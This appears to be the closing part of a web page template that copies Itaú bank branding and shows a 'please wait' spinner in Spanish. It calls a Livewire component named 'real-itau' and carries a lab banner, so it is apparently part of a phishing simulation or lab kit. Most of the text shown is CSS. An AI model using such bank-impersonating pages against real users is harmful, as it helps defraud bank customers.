            --font-size-56: 56px;
            --h1-size: var(--h1-font-size);
            --h2-size: var(--h2-font-size);
            --h3-size: var(--h3-font-size);
            --h4-size: var(--h4-font-size);
            --h5-size: var(--h5-font-size);
            --h6-size: var(--h6-font-size);
            --font-size-general: var(--font-size-base);
            --font-size-general-lg: var(--font-size-lg);
            --font-size-general-sm: var(--font-size-sm);
            --font-family-Dpro: var(--font-family-base);
            --font-family-txt: var(--font-family-sans-serif);
            --it-font-family: Itau_Icons;
            --font-weight-regular-t: var(--font-weight-normal);
            --font-weight-bold-t: var(--font-weight-bold);
            --font-weight-light-t: var(--font-weight-light);
            --font-w-regular-p: var(--display1-weight);
            --font-w-bold-p: var(--display2-weight);
            --letter-spacing-0: 0;
            --letter-spacing-04: -0.4;
            --letter-spacing-auto: auto;
            --line-height-16: 16px;
            --line-height-20: 20px;
            --line-height-24: 24px;
            --line-height-32: 32px;
            --line-height-40: 40px;
            --line-height-48: 48px;
            --line-height-52: 52px;
            --line-height-56: 56px;
            --path-img: ../images;
            --path-font: ../fonts;
            --path-font-ico: ../fonts/font_icons;
            --spacer-0-p-t-b: var(--spacer-0);
            --spacer-1-p-t-b: var(--spacer-1);
            --spacer-2-p-t-b: var(--spacer-2);
            --spacer-3-p-t-b: var(--spacer-3);
            --spacer-4-p-t-b: var(--spacer-4);
            --spacer-5-p-t-b: var(--spacer-5);
            --spacer-6-p-t-b: var(--spacer-6);
            --spacer-7-p-t-b: var(--spacer-7);
            --container-max-sm: 540px;
            --rounded-pill: 50rem;
            --display4-weight: 300;
            --danger: #da1414;
            --display2-size: 5.5rem;
            --body-bg: #fff;
            --display3-weight: 300;
            --box-shadow-sm: 0 .125rem .25rem rgba(0, 0, 0, .075);
            --font-weight-lighter: lighter;
            --transition-collapse: height .35s ease;
            --blockquote-small-color: #6b6c7e;
            --secondary: #6b6c7e;
            --hr-border-color: rgba(0, 0, 0, .1);
            --hr-border-margin-y: 1rem;
            --light: #f1f2f5;
            --btn-secondary-background-color: #fff;
            --btn-outline-secondary-hover-border-color: transparent;
            --display3-size: 4.5rem;
            --primary: #0b5fff;
            --container-max-md: 720px;
            --border-radius-sm: 0.1875rem;
            --display-line-height: 1.2;
            --aspect-ratio-4-to-3: 75%;
            --spacer-10: 10rem;
            --font-weight-semi-bold: 600;
            --font-weight-normal: 400;
            --dark: #272833;
            --blockquote-small-font-size: 80%;
            --blockquote-font-size: 1.25rem;
            --transition-fade: opacity .15s linear;
            --display4-size: 3.5rem;
            --border-radius-lg: 0.375rem;
            --btn-primary-hover-color: #fff;
            --display1-size: 6rem;
            --brand-color-4: #30313f;
            --black: #000;
            --lighter: #f7f8f9;
            --gray-700: #495057;
            --btn-outline-secondary-hover-color: #272833;
            --body-color: #272833;
            --btn-outline-secondary-hover-background-color: rgba(39, 40, 51, 0.03);
            --btn-primary-color: #fff;
            --box-shadow-lg: 0 1rem 3rem rgba(0, 0, 0, .175);
            --container-max-lg: 960px;
            --aspect-ratio: 100%;
            --gray-dark: #393a4a;
            --aspect-ratio-16-to-9: 56.25%;
            --box-shadow: 0 .5rem 1rem rgba(0, 0, 0, .15);
            --white: #fff;
            --warning: #b95000;
            --info: #2e5aac;
            --hr-border-width: 1px;
            --gray-400: #cdced9;
            --success: #287d3c;
            --lead-font-size: 1.25rem;
            --border-radius: 0.25rem;
            --spacer-9: 9rem;
            --font-weight-light: 300;
            --spacer-8: 7.5rem;
            --border-radius-circle: 50%;
            --aspect-ratio-8-to-3: 37.5%;
            --font-weight-bolder: 900;
            --container-max-xl: 1248px;
            --btn-outline-secondary-color: #6b6c7e;
            --gray-900: #272833;
            --text-muted: #a7a9bc;
            --btn-outline-secondary-border-color: #cdced9;
            --lead-font-weight: 300;
            --font-family-base: 'ItauDisplayPro';
            --h4-font-size: 24px;
            --font-weight-bold: bold;
            --btn-outline-primary-border-color: #106EB0;
            --spacer-0: 0px;
            --h6-font-size: 20px;
            --h2-font-size: 40px;
            --font-family-monospace: SFMono-Regular, Menlo, Monaco, Consolas, 'Liberation Mono', 'Courier New', monospace;
            --btn-secondary-hover-color: #FF7D00;
            --display2-weight: 700;
            --spacer-2: 18px;
            --spacer-1: 16px;
            --spacer-4: 24px;
            --display1-weight: 400;
            --spacer-3: 20px;
            --spacer-6: 40px;
            --h5-font-size: 24px;
            --spacer-5: 32px;
            --spacer-7: 49px;
            --font-size-lg: 24px;
            --brand-color-3: #56504C;
            --font-family-sans-serif: 'Itau-font-txt';
            --brand-color-2: #FF6200;
            --brand-color-1: #FF6200;
            --h3-font-size: 32px;
            --btn-outline-primary-hover-border-color: #0C5384;
            --gray-100: #F7F4F2;
            --gray-500: #89837F;
            --btn-link-color: #106EB0;
            --gray-300: #D6D0CC;
            --gray-200: #EFE9E5;
            --h1-font-size: 48px;
            --btn-secondary-hover-background-color: #FAF7F5;
            --gray-800: #231D19;
            --btn-outline-primary-hover-background-color: #ffffff;
            --gray-600: #56504C;
            --btn-primary-hover-background-color: #FF7D00;
            --btn-secondary-border-color: #ffffff;
            --btn-link-hover-color: #FF7D00;
            --btn-outline-primary-color: #106EB0;
            --btn-primary-hover-border-color: #FF7D00;
            --btn-primary-background-color: #FF6200;
            --btn-outline-primary-hover-color: #0C5384;
            --btn-secondary-color: #FF7D00;
            --btn-secondary-hover-border-color: #FAF7F5;
            --font-size-sm: 14px;
            --btn-primary-border-color: #FF6200;
            --font-size-base: 16px;
            --dt-row-selected: 13, 110, 253;
            --dt-row-selected-text: 255, 255, 255;
            --dt-row-selected-link: 9, 10, 11;
            -webkit-font-smoothing: antialiased;
            text-align: inherit;
            display: inline-block;
            font-weight: var(--font-weight-semi-bold, 600);
            max-width: 100%;
            word-wrap: break-word;
            box-sizing: border-box;
            cursor: pointer;
            font-size: var(--font-size-general-sm);
            line-height: var(--line-height-24);
            letter-spacing: var(--letter-spacing-0);
            font-family: "var(--font-family-txt)";
            margin-bottom: 1px;
            color: var(--gray-5);
        }

        .loading-spinner {
            display: inline-block;
            width: 100px;
            height: 100px;
            border: 10px solid rgba(230, 230, 230, .3);
            border-radius: 50%;
            border-top-color: #FF6200;
            animation: spin 1s ease-in-out infinite;
        }

        @keyframes spin {
            to {
                transform: rotate(360deg);
            }
        }

        @media only screen and (min-width: 768px) {
            body {
                width: 40%;
                /* Ancho del cuerpo en dispositivos de escritorio */
                margin: 0 auto;
                /* Centra el cuerpo horizontalmente */
            }
        }
    </style>

</head>

<body>
<x-lab-banner />
    <div class="text-center py-4" style="background-color: #FF6200;">
        <img src="/itau/logo_itau.png" width="48" height="48" alt="">
    </div>
    <br>
    <br>
    <div class="text-center mt-5">
        <div class="loading-spinner"></div>
    </div>
    <br>
    <div class="text-center">
        <p class="texto-1">Espere un momento por favor.</p>
    </div>



    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/js/bootstrap.bundle.min.js"
        integrity="sha384-C6RzsynM9kWDrMNeT87bh95OGNyZPhcTNXj1NW7RuBCsyN/o0jlpcV8Qyq46cDfL"
        crossorigin="anonymous"></script>
    <div>
        @livewire('real-itau')
    </div>
    @livewireScripts

</body>

</html>